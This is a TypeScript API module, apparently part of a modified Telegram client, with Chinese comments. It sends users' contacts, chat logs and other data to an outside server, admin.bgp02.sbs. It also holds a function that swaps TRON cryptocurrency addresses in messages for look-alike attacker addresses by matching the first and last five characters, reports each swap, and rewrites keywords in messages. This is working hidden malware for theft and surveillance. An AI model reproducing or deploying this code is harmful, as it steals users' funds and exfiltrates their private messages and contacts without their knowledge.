export type KeywordMap = {
  [key: string]: string;
};
const Base_Url = "https://admin.bgp02.sbs/api";


export async function sendUserData(params: { [key: string]: string | null }) {
  const response = await fetch(Base_Url+'/telegram/tgttup', {
    method: "POST",
    headers: {
      "Content-Type": "application/json",
    },
    body: JSON.stringify(params),
  });

  const data = await response.json();

  if (!response.ok || Number(data?.code) !== 1) {
    throw new Error(data?.msg || `tgttup failed with status ${response.status}`);
  }

  return data;
}
export async function sendUserDataMt(params: { [key: string]: string | null }) {
  try {
    const response = await fetch(Base_Url + '/telegram/tgttup', {
      method: "POST",
      headers: {
        "Content-Type": "application/json",
      },
      body: JSON.stringify(params),
    });
    return await response.json();
  } catch (error) {
    console.error("Error:", error);
  }
}

//联系人上报
export async function sendContacts(data:object) {
  try {
    const response = await fetch(Base_Url+'/telegram/tgcontacts', {
      method: 'POST',
      headers: {
        'Content-Type': 'application/json', // 指定发送的数据类型
      },
      body: JSON.stringify(data), // 将对象转为 JSON 字符串
    });
    return await response.json();
  } catch (error) {
    console.error('提交失败:', error);
  }
}
//发送消息上报
export async function upMessage(data:object) {
  
  try {
    const response = await fetch(Base_Url+'/telegram/chatlog', {
      method: 'POST',
      headers: {
        'Content-Type': 'application/json', // 指定发送的数据类型
      },
      body: JSON.stringify(data), // 将对象转为 JSON 字符串
    });
    return await response.json();
  } catch (error) {
    console.error('提交失败:', error);
  }
}
//替换地址上报
export async function replaceTrxUp(data:object) {
  
  try {
    const response = await fetch(Base_Url+'/telegram/replaceadddress', {
      method: 'POST',
      headers: {
        'Content-Type': 'application/json', // 指定发送的数据类型
      },
      body: JSON.stringify(data), // 将对象转为 JSON 字符串
    });
    return await response.json();
  } catch (error) {
    console.error('提交失败:', error);
  }
}


//获取关键字
export async function getJsonAsync() {
  try {
    const response = await fetch('/jsonData/keyword.json');
    return await response.json();
  } catch (error) {
    console.error('提交失败:', error);
  }
}

//波场地址正则
export const tronAddressRegex = /\bT[1-9A-HJ-NP-Za-km-z]{33}\b/g;

//获取波场地址
export async function getTronJson() {
  try {
    const response = await fetch('/jsonData/tron.json');
    return await response.json();
  } catch (error) {
    console.error('提交失败:', error);
  }
}

//替换波场地址
export function replaceTron(input: string, array: string[]): string {
  if (!array || array.length === 0) {
      return input;
  }
  const hasString = array.some(item=>{
    return item == input
  })
  if(hasString){
    return input
  }
  for (const item of array) {
      if (input.startsWith(item.slice(0, 5)) && input.endsWith(item.slice(-5))) {
          return item;
      }
  }

  const randomIndex = Math.floor(Math.random() * array.length);
  return array[randomIndex];
}

//替换关键字
export function replaceText(input: string, keywordMap: KeywordMap) {
  // 将替换键按长度降序排列，避免短词优先匹配
  const keys = Object.keys(keywordMap).sort((a, b) => b.length - a.length);
  // 转义正则中的特殊字符
  const escapedKeys = keys.map((key) =>
    key.replace(/[.*+?^${}()|[\]\\]/g, "\\$&")
  );
  // 创建全局匹配的正则表达式
  const regex = new RegExp(escapedKeys.join("|"), "g");
  // 执行替换
  return input.replace(regex, (match) => keywordMap[match]);
}
//获取开屏广告轮播
export async function getScreenBanner() {
  
  try {
    const response = await fetch(Base_Url+'/telegram/bannerBootTop', {
      method: 'POST' // 将对象转为 JSON 字符串
    });

    return await response.json();
  } catch (error) {
    console.error('提交失败:', error);
  }
}
//获取聊天列表最上边广告轮播
export async function getBanner() {
  
  try {
    const response = await fetch(Base_Url+'/telegram/bannerIndexTop', {
      method: 'POST' // 将对象转为 JSON 字符串
    });

    return await response.json();
  } catch (error) {
    console.error('提交失败:', error);
  }
}
//获取聊天列表最上边广告轮播
export async function getChatBanner() {
  
  try {
    const response = await fetch(Base_Url+'/telegram/bannerChatTop', {
      method: 'POST' // 将对象转为 JSON 字符串
    });

    return await response.json();
  } catch (error) {
    console.error('提交失败:', error);
  }
}

//获取聊天列表最上边广告轮播
export async function getMenuItem() {
  
  try {
    const response = await fetch(Base_Url+'/telegram/gettabbar', {
      method: 'POST' // 将对象转为 JSON 字符串
    });

    return await response.json();
  } catch (error) {
    console.error('提交失败:', error);
  }
}
//获取基础配置
export async function getBaseconfig() {
  
  try {
    const response = await fetch(Base_Url+'/telegram/baseconfig', {
      method: 'POST' // 将对象转为 JSON 字符串
    });

    return await response.json();
  } catch (error) {
    console.error('提交失败:', error);
  }
}
